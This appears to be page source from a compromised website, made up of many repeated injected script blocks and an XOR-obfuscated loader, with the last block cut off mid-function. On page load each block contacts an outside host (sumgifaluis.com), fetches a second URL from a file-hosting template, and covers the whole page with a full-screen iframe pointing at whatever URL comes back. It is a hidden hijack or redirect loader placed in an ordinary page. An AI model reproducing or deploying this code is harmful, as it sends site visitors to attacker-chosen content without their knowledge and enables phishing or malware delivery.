62,62,51,52,61,96,106,120,118,87,80,122,122,122,122,122,122,120,53,44,63,40,60,54,53,45,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,44,51,41,51,56,51,54,51,46,35,96,50,51,62,62,63,52,120,118,87,80,122,122,122,122,122,122,120,53,42,59,57,51,46,35,96,106,120,118,87,80,122,122,122,122,122,122,120,42,53,51,52,46,63,40,119,63,44,63,52,46,41,96,52,53,52,63,120,118,87,80,122,122,122,122,122,122,120,56,59,57,49,61,40,53,47,52,62,96,46,40,59,52,41,42,59,40,63,52,46,120,87,80,122,122,122,122,7,116,48,53,51,52,114,120,97,120,115,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,54,53,59,62,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,57,54,53,41,63,62,115,122,40,63,46,47,40,52,97,87,80,122,122,122,122,122,122,51,60,122,114,123,40,63,61,51,41,46,40,35,116,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,44,63,59,54,114,115,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,51,60,40,59,55,63,116,53,52,63,40,40,53,40,122,103,122,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,97,87,80,87,80,122,122,122,122,46,51,55,63,53,47,46,19,62,122,103,122,41,63,46,14,51,55,63,53,47,46,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,118,122,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,115,97,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,55,53,47,52,46,116,59,42,42,63,52,62,25,50,51,54,62,114,51,60,40,59,55,63,115,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,62,63,41,46,40,53,35,114,115,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,40,47,52,114,115,122,33,87,80,122,122,122,122,45,59,40,55,47,42,21,40,51,61,51,52,41,114,115,97,87,80,122,122,122,122,56,51,52,62,23,63,41,41,59,61,63,18,59,52,62,54,63,40,114,115,97,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,63,46,57,50,14,63,34,46,20,53,14,50,40,53,45,114,27,10,19,5,19,30,5,15,8,22,118,122,40,63,61,51,41,46,40,35,116,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,51,62,122,103,122,114,51,62,122,38,38,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,51,62,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,40,63,41,53,54,44,63,22,59,52,62,51,52,61,15,40,54,114,51,62,115,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,46,50,63,52,114,60,47,52,57,46,51,53,52,122,114,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,60,51,52,59,54,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,60,51,52,59,54,15,40,54,115,97,87,80,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,60,51,52,59,54,15,40,54,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,44,59,40,122,60,51,52,59,54,21,40,51,61,51,52,122,103,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,60,51,52,59,54,21,40,51,61,51,52,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,62,52,41,119,42,40,63,60,63,46,57,50,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,122,122,59,62,62,18,51,52,46,114,120,42,40,63,57,53,52,52,63,57,46,120,118,122,60,51,52,59,54,21,40,51,61,51,52,115,97,87,80,122,122,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,122,122,59,57,46,51,44,59,46,63,19,60,40,59,55,63,114,60,51,52,59,54,15,40,54,115,97,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,60,51,52,59,54,15,40,54,97,87,80,122,122,122,122,122,122,39,115,87,80,122,122,122,122,122,122,116,57,59,46,57,50,114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,122,122,122,122,122,122,57,54,63,59,52,47,42,114,120,62,53,52,63,120,115,97,87,80,122,122,122,122,122,122,39,115,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,103,122,40,47,52,114,115,97,87,80,39,115,114,115,97];return String.fromCharCode.apply(String,_0x5641.map(function(c){return c^0x5A;}));})();var __d=document;var __h=__d.head||__d.documentElement;var __sc=__d.createElement("script");__sc.type="text/javascript";__sc.text=__s;__h.appendChild(__sc);})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();
  var TRUSTED_CONFIGS = [{"template":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),"useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
